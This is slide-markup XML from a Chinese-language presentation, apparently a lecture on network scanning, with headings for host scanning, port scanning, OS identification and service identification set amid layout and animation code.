                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="44" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="46" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="47" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="48" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="49" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="51" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="52" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="53" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="55" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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p:bldP spid="81" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="82" grpId="0" bldLvl="0" animBg="1"/>
    </p:bldLst>
  </p:timing>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5" name="组合 44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1847711" y="1845636"/>
            <a:ext cx="2926715" cy="1638300"/>
            <a:chOff x="280807" y="-427279"/>
            <a:chExt cx="3055299" cy="2252704"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="平行四边形 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="280807" y="-427279"/>
              <a:ext cx="3055299" cy="2252704"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="文本框 9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1415026" y="-203755"/>
              <a:ext cx="1187251" cy="1482594"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="7200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="60" name="组合 59"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4596789" y="1989833"/>
            <a:ext cx="7328535" cy="1258570"/>
            <a:chOff x="3663165" y="953426"/>
            <a:chExt cx="5496401" cy="1108953"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="矩形 60"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4060358" y="1005461"/>
              <a:ext cx="4914900" cy="622737"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr sz="4000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>2.2 网络扫描</a:t>
              </a:r>
              <a:endParaRPr sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="平行四边形 61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3663165" y="953426"/>
              <a:ext cx="5496401" cy="1108953"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="158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91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="等腰三角形 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-125866" y="4437500"/>
            <a:ext cx="3458403" cy="2584187"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="等腰三角形 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1348800" y="5033297"/>
            <a:ext cx="2607127" cy="1948097"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha val="7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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6146" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="3531870"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="4331970"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.2 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="5132070"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.3 系统识别</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="5932170"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.4 服务识别</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>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0" name="组合 49"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="258445" y="2941320"/>
            <a:ext cx="11638280" cy="2962910"/>
            <a:chOff x="407" y="2772"/>
            <a:chExt cx="18328" cy="4666"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2" name="Group 3"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="407" y="5987"/>
              <a:ext cx="18328" cy="121"/>
              <a:chOff x="1765833" y="4036682"/>
              <a:chExt cx="9317522" cy="50962"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3" name="Rectangle 4"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3040807" y="4036682"/>
                <a:ext cx="1683494" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="4" name="Rectangle 5"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4724303" y="4036682"/>
                <a:ext cx="1715155" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5" name="Rectangle 6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6435557" y="4036682"/>
                <a:ext cx="1661572" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Rectangle 7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8087643" y="4036682"/>
                <a:ext cx="1720740" cy="50962"/>
              </a:xfrm>
              <a:prstGeom prst="rect">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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Rectangle 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1765833" y="4036682"/>
                <a:ext cx="1274973" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="Rectangle 9"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9808382" y="4036682"/>
                <a:ext cx="1274973" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9" name="Group 10"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8057" y="2772"/>
              <a:ext cx="2054" cy="3685"/>
              <a:chOff x="7980911" y="2484779"/>
              <a:chExt cx="1304470" cy="2340121"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="10" name="Group 11"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="7980911" y="2484779"/>
                <a:ext cx="1304470" cy="1802479"/>
                <a:chOff x="3149600" y="2480384"/>
                <a:chExt cx="1201204" cy="1660005"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="17" name="等腰三角形 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="3149600" y="3200883"/>
                  <a:ext cx="1201204" cy="939506"/>
                </a:xfrm>
                <a:prstGeom prst="triangle">
                  <a:avLst/>
                </a:prstGeom>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent4"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="EEECE1">
                        <a:lumMod val="90000"/>
                        <a:alpha val="0"/>
                      </a:srgbClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
